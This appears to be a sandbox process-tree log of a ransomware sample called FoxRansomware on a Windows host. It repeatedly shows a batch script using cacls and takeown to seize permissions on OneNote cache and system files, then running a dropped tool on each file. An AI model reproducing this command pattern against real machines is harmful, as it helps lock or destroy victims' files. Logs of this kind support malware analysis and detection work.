-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A9.bin" -nobanner3⤵PID:7996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A9.bin" -nobanner4⤵PID:4648
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:7960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:7156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000007.bin" -nobanner3⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000007.bin" -nobanner4⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:7628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:8116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000L.bin" -nobanner3⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000L.bin" -nobanner4⤵PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:7452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵PID:7896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000V.bin" -nobanner3⤵PID:7924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000V.bin" -nobanner4⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl""2⤵PID:5648
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl"3⤵
- Modifies file permissions
PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" -nobanner3⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "UpdateSessionOrchestration.13146fa0-5eea-490f-bb18-886e36bf1f2c.1.etl" -nobanner4⤵PID:7504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""2⤵PID:6424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C3⤵PID:3040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"3⤵PID:2068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000C.bin" -nobanner3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000C.bin" -nobanner4⤵PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""2⤵PID:6040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"3⤵
- Modifies file permissions
PID:3620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000O.bin" -nobanner3⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000O.bin" -nobanner4⤵PID:6764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""2⤵PID:6176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C3⤵PID:7324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000012.bin" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000012.bin" -nobanner4⤵PID:1300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""2⤵PID:8056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C3⤵PID:7928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"3⤵PID:6816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000056.bin" -nobanner3⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000056.bin" -nobanner4⤵PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""2⤵PID:8088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C3⤵PID:5684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"3⤵PID:6984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000072.bin" -nobanner3⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000072.bin" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""2⤵PID:7752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C3⤵PID:7056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007C.bin" -nobanner3⤵PID:6820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007C.bin" -nobanner4⤵PID:6444
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""2⤵PID:7356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C3⤵PID:4896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"3⤵
- Modifies file permissions
PID:6600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007M.bin" -nobanner3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007M.bin" -nobanner4⤵PID:6724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""2⤵PID:7844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C3⤵PID:4120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"3⤵PID:6564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008L.bin" -nobanner3⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008L.bin" -nobanner4⤵PID:5048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C3⤵PID:5180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000091.bin" -nobanner3⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000091.bin" -nobanner4⤵PID:2220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:5348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:6752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵
- Modifies file permissions
PID:6304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006L.bin" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006L.bin" -nobanner4⤵PID:6344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""2⤵PID:6648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C3⤵PID:5300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"3⤵PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009M.bin" -nobanner3⤵PID:6320
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009M.bin" -nobanner4⤵PID:7372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""2⤵PID:5512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C3⤵PID:3204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"3⤵PID:6576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A7.bin" -nobanner3⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A7.bin" -nobanner4⤵PID:6452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:6776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:7736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007T.bin" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007T.bin" -nobanner4⤵PID:8124
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:8136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:7028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000087.bin" -nobanner3⤵PID:5428
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000087.bin" -nobanner4⤵PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""2⤵PID:6884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C3⤵PID:6812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"3⤵
- Modifies file permissions
PID:8152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner3⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:6464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:7196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:1388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:7588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:6944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:6896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:6296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:7644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵
- Modifies file permissions
PID:7188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000099.bin" -nobanner3⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000099.bin" -nobanner4⤵PID:8040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:5632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:7496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵PID:7772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009J.bin" -nobanner3⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009J.bin" -nobanner4⤵PID:8100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:2292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:7624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵
- Modifies file permissions
PID:7988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A4.bin" -nobanner3⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A4.bin" -nobanner4⤵PID:4188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:7104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:7460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:7396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AF.bin" -nobanner3⤵PID:8012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AF.bin" -nobanner4⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:5816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:6484
-
-
